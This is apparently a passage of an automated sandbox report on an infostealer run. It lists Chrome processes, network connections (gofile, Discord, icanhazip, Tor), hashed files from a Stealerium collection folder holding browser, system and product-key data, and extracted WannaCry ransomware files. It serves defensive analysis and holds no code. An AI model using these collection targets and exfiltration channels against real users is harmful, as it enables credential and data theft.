"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6260,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6312 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5792,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3252 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6356,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6164 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6264,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=3468 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6312,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=6460 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=5540,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5972 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=3376,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5752 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --enable-chrome-cart --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=6340,i,2512364480656593550,18288202132685005149,262144 --variations-seed-version=20240418-180204.077000 --mojo-platform-channel-handle=5784 /prefetch:1
Network
| Country | Destination | Domain | Proto |
| FR | 216.58.215.36:443 | www.google.com | tcp |
| FR | 216.58.215.36:443 | www.google.com | udp |
| FR | 142.250.178.142:443 | apis.google.com | tcp |
| FR | 142.250.179.78:443 | chrome.google.com | tcp |
| US | 8.8.8.8:53 | 36.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.214.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.179.250.142.in-addr.arpa | udp |
| FR | 172.217.20.174:443 | www.youtube.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| FR | 216.58.213.78:443 | www.youtube.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| FR | 216.58.215.42:443 | content-autofill.googleapis.com | tcp |
| US | 152.199.19.74:80 | evcs-ocsp.ws.symantec.com | tcp |
| FR | 172.217.20.174:443 | www.youtube.com | tcp |
| FR | 142.250.179.110:443 | www.youtube.com | tcp |
| FR | 142.250.179.110:443 | www.youtube.com | tcp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| FR | 51.178.66.33:443 | api.gofile.io | tcp |
| US | 136.175.10.233:443 | store3.gofile.io | tcp |
| FR | 142.250.179.110:443 | www.youtube.com | udp |
| SE | 216.58.211.3:443 | id.google.com | tcp |
| FR | 172.217.20.206:443 | www.youtube.com | tcp |
| FR | 172.217.20.196:443 | t0.gstatic.com | tcp |
| FR | 172.217.20.174:443 | www.youtube.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 162.159.137.232:443 | discord.com | tcp |
| SE | 216.58.211.3:443 | id.google.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| FR | 216.58.215.42:443 | content-autofill.googleapis.com | tcp |
| US | 185.199.109.154:443 | github.githubassets.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| FR | 216.58.215.42:443 | content-autofill.googleapis.com | udp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:51822 | tcp | |
| FR | 37.187.102.186:9001 | tcp | |
| US | 154.35.175.225:443 | tcp | |
| AT | 86.59.119.88:443 | tcp | |
| FR | 212.83.154.33:8443 | tcp | |
| DE | 85.214.206.219:9001 | tcp | |
| DE | 193.23.244.244:443 | tcp | |
| US | 23.108.55.71:443 | tcp | |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| FR | 216.58.215.36:443 | www.google.com | udp |
| FR | 172.217.20.174:443 | www.youtube.com | udp |
| FR | 142.250.179.118:443 | i.ytimg.com | tcp |
| FR | 142.250.179.118:443 | i.ytimg.com | tcp |
| FR | 142.250.179.118:443 | i.ytimg.com | tcp |
| FR | 142.250.179.118:443 | i.ytimg.com | tcp |
| FR | 142.250.179.110:443 | www.youtube.com | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| FR | 142.250.75.238:443 | www.youtube.com | udp |
| FR | 142.250.75.238:443 | www.youtube.com | tcp |
| FR | 172.217.20.174:443 | www.youtube.com | udp |
| FR | 142.250.75.238:443 | www.youtube.com | udp |
| FR | 142.250.179.118:443 | i.ytimg.com | tcp |
| FR | 142.250.201.162:443 | googleads.g.doubleclick.net | tcp |
| FR | 142.250.75.230:443 | static.doubleclick.net | tcp |
| FR | 142.250.179.74:443 | jnn-pa.googleapis.com | tcp |
| FR | 142.250.179.74:443 | jnn-pa.googleapis.com | udp |
| FR | 142.250.201.162:443 | googleads.g.doubleclick.net | udp |
| FR | 172.217.20.206:443 | www.youtube.com | udp |
| NL | 23.62.61.160:443 | www.bing.com | tcp |
| BE | 104.68.66.114:443 | cxcs.microsoft.net | tcp |
| FR | 172.217.20.174:443 | www.youtube.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| FR | 216.58.215.42:443 | content-autofill.googleapis.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:9050 | tcp | |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:9050 | tcp | |
| FR | 216.58.215.36:443 | www.google.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| N/A | 127.0.0.1:9050 | tcp | |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| FR | 142.250.75.234:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | 234.75.250.142.in-addr.arpa | udp |
Files
memory/3988-0-0x0000000074D8E000-0x0000000074D8F000-memory.dmp
memory/3988-1-0x0000000000C90000-0x0000000000E22000-memory.dmp
memory/3988-2-0x00000000058E0000-0x0000000005946000-memory.dmp
memory/3988-3-0x0000000074D80000-0x0000000075531000-memory.dmp
\??\pipe\crashpad_4540_WNYRHTOJSGCEXCBN
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/3988-39-0x0000000005E00000-0x0000000005E92000-memory.dmp
memory/3988-40-0x0000000005E90000-0x0000000005EB6000-memory.dmp
memory/3988-41-0x0000000005EC0000-0x0000000005EC8000-memory.dmp
memory/3988-42-0x0000000006DE0000-0x0000000006DEA000-memory.dmp
memory/3988-43-0x0000000006DF0000-0x0000000006DF8000-memory.dmp
memory/3988-44-0x0000000006E10000-0x0000000006E2E000-memory.dmp
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\Browsers\Firefox\Bookmarks.txt
| MD5 | 2e9d094dda5cdc3ce6519f75943a4ff4 |
| SHA1 | 5d989b4ac8b699781681fe75ed9ef98191a5096c |
| SHA256 | c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142 |
| SHA512 | d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7 |
memory/3988-96-0x0000000007860000-0x00000000078F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log
| MD5 | 59ad588c3638a1bc8edf921182c2e138 |
| SHA1 | 731dc6823d9ac63a390828e4602c76e77b6a3b08 |
| SHA256 | 9ca9011f8b7d8165205ea445c9517c99e04225b4db8eb96d58615811839d4b6c |
| SHA512 | 01c2d35f135d5ce4ce115e216d8205bf64732d25b1646f53da89452233bfe7c829856fd3b92dd34ccb19985e30d49014c135b4f9c69108eaeace03086ef3a998 |
memory/3988-111-0x0000000007F10000-0x00000000084B6000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | db51d8773f6e08d3832fa391d93113b3 |
| SHA1 | 4f5a48e55af01b37456a7207ecae8aa76d3fa6b1 |
| SHA256 | cc893b143487b7969f727748359af137675d07ea5a75f53db671377bf37b8235 |
| SHA512 | decebc5634462f7e38fdea255604ffd21612579a9ba45cee300aaa5099461e1e6d48014b6c18f55a33063e3fd870d33f74f4095d2acf711f2eb8d1af902db811 |
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\System\Process.txt
| MD5 | ae6b61253c59a6c71ed8b8df58f88d49 |
| SHA1 | 7db2aab9ae93957dc5d53efb9589b6d736b1488a |
| SHA256 | 17f2e8966e5d1c5929365209a4f9c2d885f9cb1d93a76d1cbcc0799bb696ed51 |
| SHA512 | 348f3d638cb466bb79d42b3fb33143fd117700a47c381bc2239d7918d264fc38c6d0a40ad0d89732e2780c997e3897e779b80046bda6030bb4d6c829349df0bc |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 337d7e53ce27099fd87703cfdcaea2a7 |
| SHA1 | 5aff11a6539f16b88fbe17eef3a585da928491bd |
| SHA256 | 485d6d79e94533cd13507d296f31ba21f50fb1e728bf93a8325b832f7e29dbb6 |
| SHA512 | 00d4a98a55be11b7e2899baf88a9926f5bb769f3cb05de887c0b45fc9020da538df426a6c0954e6fe6676b7bbc505938ed7e5bab6ad2458ac9b8a829dd628802 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 28cbcef72b38eb9c84a81bdc9eedea38 |
| SHA1 | cb582fe383a2691459c7a655fd9b5c14e7ab6cb5 |
| SHA256 | 80cb8f03c8ac2a5f8824b4f36a4e2de430413c9e3e8cf25191e01f61f91c6e86 |
| SHA512 | c31b2b994df79598e90677696fe7284ec4c70c50f20f846e6ab5229ce60a75b6c7a82a9fe7d86bc95105ec15b061663b2e200bd569b24b04bdbfba3f1fffe5bb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3fb408801ef7e83da14082063e053fb9 |
| SHA1 | a4424d2713f380ba63793530bf5fe9261899ea33 |
| SHA256 | f2631814303868e093d80d699c2b9b702ed14d47052824b56bb1521d33e11853 |
| SHA512 | c7de1162b0d5cb9fb1802544d84e43eeffd2765b3c0a4bba082d491f9ce02638dde21d09fff1fbbc026b1bade958afdb4ae990d6deb3000fac13f315ee21a58b |
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\System\Apps.txt
| MD5 | 2d6d26d892773e7cddb81d8fcf2e5c26 |
| SHA1 | 6617c010f2973e227fa5446a5142c20c9e605d39 |
| SHA256 | ed9ae54a8ca1b184a75ee29b83220e25fa44f81f3f591c8ff84121e8fc569ac7 |
| SHA512 | 912df0cf4617f5980c1316f59be225185a2578ce4820b6610ce9c51b9c0c38bad7d197fe1b3cba0ae3bb8fb78b3a9d13d767bb1ae743e4b6ec64ff174a782d5e |
memory/3988-315-0x0000000006F20000-0x0000000006F9A000-memory.dmp
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\Directories\OneDrive.txt
| MD5 | 966247eb3ee749e21597d73c4176bd52 |
| SHA1 | 1e9e63c2872cef8f015d4b888eb9f81b00a35c79 |
| SHA256 | 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e |
| SHA512 | bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa |
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\Directories\Videos.txt
| MD5 | 1fddbf1169b6c75898b86e7e24bc7c1f |
| SHA1 | d2091060cb5191ff70eb99c0088c182e80c20f8c |
| SHA256 | a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733 |
| SHA512 | 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d |
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\System\ProductKey.txt
| MD5 | 71eb5479298c7afc6d126fa04d2a9bde |
| SHA1 | a9b3d5505cf9f84bb6c2be2acece53cb40075113 |
| SHA256 | f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3 |
| SHA512 | 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd |
memory/3988-388-0x00000000074A0000-0x0000000007552000-memory.dmp
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\Admin@UBLNJRHF_en-US\Directories\Startup.txt
| MD5 | 68c93da4981d591704cea7b71cebfb97 |
| SHA1 | fd0f8d97463cd33892cc828b4ad04e03fc014fa6 |
| SHA256 | 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483 |
| SHA512 | 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402 |
memory/3988-390-0x0000000007210000-0x0000000007232000-memory.dmp
memory/3988-391-0x00000000086C0000-0x0000000008A17000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 76ac4db7c912c6fe45c70a54c6c7f155 |
| SHA1 | 0a31f5c3cc8e9350072e43b600456ba5eaa28813 |
| SHA256 | f3a9cd855116b1edf29748423cf68cddadf3622ccc9e8eeee653db445caeda6a |
| SHA512 | 392fac656d4728515b1d10c86b852f0f8cf0ae78d1690c5d0c868ad852587525240a83a2ab121e3b20035fa72ffb2e29f47bbb622b471939e2bb18c850d0f4ca |
C:\Users\Admin\AppData\Local\18aa4fb6b7cf00fabbee0b625d76c278\msgid.dat
| MD5 | 55a3176d4f6082ac61bd075eace8228c |
| SHA1 | fa167d35877a4f4eedde83e10ddc733e6be36a7c |
| SHA256 | 4e380fa1ea632c4c99386057f04201503c8e5310ca82e8361fd8e4b8f9ab11c5 |
| SHA512 | 8a9b272ad3fbdd2c54c1c90c8819abf63cd42c68acf99857238cd8012e1d96ab32605a13caac8fa4df75bce76a0939867c325be6a52e9f4ce21d4efc13e052f8 |
memory/3988-463-0x0000000007790000-0x000000000779A000-memory.dmp
memory/3988-464-0x0000000074D8E000-0x0000000074D8F000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 23d3f57208da5285124faba1d583ff44 |
| SHA1 | 665d0c30aca6923ac7881ce1ad605347f77a4ec0 |
| SHA256 | 4d3d08edd8840b78cd2727da5a8938b48b344db495bac79710c094505f54ea7a |
| SHA512 | b4a5b1ed3a12ed6b8540c853bd0d0c1160cd10fef3982438d2f2b98aad22187508daa63c283d19b212aefd8a888878a827b5d2d2ca35b64d9c50269a66d46765 |
memory/3988-474-0x0000000074D80000-0x0000000075531000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
| MD5 | 0ed8278b11742681d994e5f5b44b8d3d |
| SHA1 | 28711624d01da8dbd0aa4aad8629d5b0f703441e |
| SHA256 | 354730711c3ca9845bf98ec5dfb58a16e50984f9edcf0e8f432742326334f8a2 |
| SHA512 | d296ab1f1b418b125f09598ca6645d984a1cf67092a914956b8879d285ee35521b408363b47da195de79086e3be3ed9b1709bc8f9cd2e32d5dccb720a010bc8c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b
| MD5 | 56fcce1e196bca8531644cca3bd7f9bf |
| SHA1 | 8de29eb2ba703cf628c5664e0ad9bdd677f7c586 |
| SHA256 | be620254eac5e0c239e88a0372ab2428a9a6322cbe3843edfdffdcf382ce1c32 |
| SHA512 | 93a4923341b99810a5d6700e26a99a525f18554380714afc3feaf9244bbe23fd4a060468899dd1d8575a6cc2c542566c2912fecf1d4f67c62cdcb77789eabed6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | e5b2cb8a77704793bff09d6e98265e4e |
| SHA1 | 12433d041e12a24ff9edd113bf7ae08f90efbf4a |
| SHA256 | 307f99082db50d25f02accba60378a3a19394095635d55825ba78824a82021f6 |
| SHA512 | 3e5e258423b1f152adfe681e06ed9f4e4ad6eb668bade5cead07c307a15eb5acebf158183d1373636b4871afab38f547fbc20187411f4cf1ab55f7ed966408a3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 18342f311cb62c6f7afa947d4d5e9273 |
| SHA1 | 78d6e12849311886daed9bc0ebf34c7a749a9505 |
| SHA256 | 7fef67e7012cd5152c36adc215b62d1bd52408d9a2f8365e11b20df606638387 |
| SHA512 | 6db2c8f785cf1f3524583a183c6f852b33642d53ee989a2ae461440ff89d7d70c780148112e0f342f32283e7f99c90d934f752f2d4e4bf07e409f50432c4b878 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
| MD5 | 4874fb82da9e619ba014c987a9d29f4e |
| SHA1 | 496a06b6bb1551f79ad40d25b06cc63c4754a5ff |
| SHA256 | d24e3cbe3927d6225fb5aa27b745caf8b079266e9387c1b755fabc33b48c60f4 |
| SHA512 | 488b6aa4ed0e810311b9a40d82707008fb01036aec8abede9e947ab9c6495b9455691caa7398b4f597546237aa3f34cfc10c7687889952b1db706c4bbe542efd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a70f61e417a47c76c717e6021e5c1b58 |
| SHA1 | b4c6124a0cd2bf68faeca1abeeff63eade628e52 |
| SHA256 | 3d2efacfc0c062124d83c73185dddeab7a172bca4edd3ef94251399ec78a0c4e |
| SHA512 | 04cbaff0024ab634d33100755b88c54e7c5cc5648cd994c26953dbc75fe77a7626633f98d2ce4b31a8d1c72de30407057b4db79ba3f09b7d812e91594ef7e7d1 |
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip.crdownload
| MD5 | efe76bf09daba2c594d2bc173d9b5cf0 |
| SHA1 | ba5de52939cb809eae10fdbb7fac47095a9599a7 |
| SHA256 | 707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a |
| SHA512 | 4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029 |
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 0365f19045b465a152210bbf0ad43e02 |
| SHA1 | 6adcfad63af895a25435d679d66cbd3742a8ab0b |
| SHA256 | 40709dcb47f7a24e809e8cbb1f04cbe1f66259187b5e27ccf047f816cdb971e0 |
| SHA512 | 3f063d9bafb32f9f95437b7d15b240b1e474cb3bae26427a203cc09a24de534fb33426215e32bfa06af1b771361b2bd23f469baf8923fd317e21a1696ae4935f |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_finnish.wnry
| MD5 | 35c2f97eea8819b1caebd23fee732d8f |
| SHA1 | e354d1cc43d6a39d9732adea5d3b0f57284255d2 |
| SHA256 | 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e |
| SHA512 | 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf |
memory/2208-747-0x0000000010000000-0x0000000010010000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry
| MD5 | 7bf2b57f2a205768755c07f238fb32cc |
| SHA1 | 45356a9dd616ed7161a3b9192e2f318d0ab5ad10 |
| SHA256 | b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25 |
| SHA512 | 91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
| MD5 | 8495400f199ac77853c53b5a3f278f3e |
| SHA1 | be5d6279874da315e3080b06083757aad9b32c23 |
| SHA256 | 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d |
| SHA512 | 0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
| MD5 | 4fef5e34143e646dbf9907c4374276f5 |
| SHA1 | 47a9ad4125b6bd7c55e4e7da251e23f089407b8f |
| SHA256 | 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79 |
| SHA512 | 4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\t.wnry
| MD5 | 5dcaac857e695a65f5c3ef1441a73a8f |
| SHA1 | 7b10aaeee05e7a1efb43d9f837e9356ad55c07dd |
| SHA256 | 97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6 |
| SHA512 | 06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\s.wnry
| MD5 | ad4c9de7c8c40813f200ba1c2fa33083 |
| SHA1 | d1af27518d455d432b62d73c6a1497d032f6120e |
| SHA256 | e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b |
| SHA512 | 115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry
| MD5 | 3e0020fc529b1c2a061016dd2469ba96 |
| SHA1 | c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade |
| SHA256 | 402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c |
| SHA512 | 5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_vietnamese.wnry
| MD5 | 8419be28a0dcec3f55823620922b00fa |
| SHA1 | 2e4791f9cdfca8abf345d606f313d22b36c46b92 |
| SHA256 | 1f21838b244c80f8bed6f6977aa8a557b419cf22ba35b1fd4bf0f98989c5bdf8 |
| SHA512 | 8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_turkish.wnry
| MD5 | 531ba6b1a5460fc9446946f91cc8c94b |
| SHA1 | cc56978681bd546fd82d87926b5d9905c92a5803 |
| SHA256 | 6db650836d64350bbde2ab324407b8e474fc041098c41ecac6fd77d632a36415 |
| SHA512 | ef25c3cf4343df85954114f59933c7cc8107266c8bcac3b5ea7718eb74dbee8ca8a02da39057e6ef26b64f1dfccd720dd3bf473f5ae340ba56941e87d6b796c9 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_swedish.wnry
| MD5 | c7a19984eb9f37198652eaf2fd1ee25c |
| SHA1 | 06eafed025cf8c4d76966bf382ab0c5e1bd6a0ae |
| SHA256 | 146f61db72297c9c0facffd560487f8d6a2846ecec92ecc7db19c8d618dbc3a4 |
| SHA512 | 43dd159f9c2eac147cbff1dda83f6a83dd0c59d2d7acac35ba8b407a04ec9a1110a6a8737535d060d100ede1cb75078cf742c383948c9d4037ef459d150f6020 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_spanish.wnry
| MD5 | 8d61648d34cba8ae9d1e2a219019add1 |
| SHA1 | 2091e42fc17a0cc2f235650f7aad87abf8ba22c2 |
| SHA256 | 72f20024b2f69b45a1391f0a6474e9f6349625ce329f5444aec7401fe31f8de1 |
| SHA512 | 68489c33ba89edfe2e3aebaacf8ef848d2ea88dcbef9609c258662605e02d12cfa4ffdc1d266fc5878488e296d2848b2cb0bbd45f1e86ef959bab6162d284079 |
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\msg\m_slovak.wnry
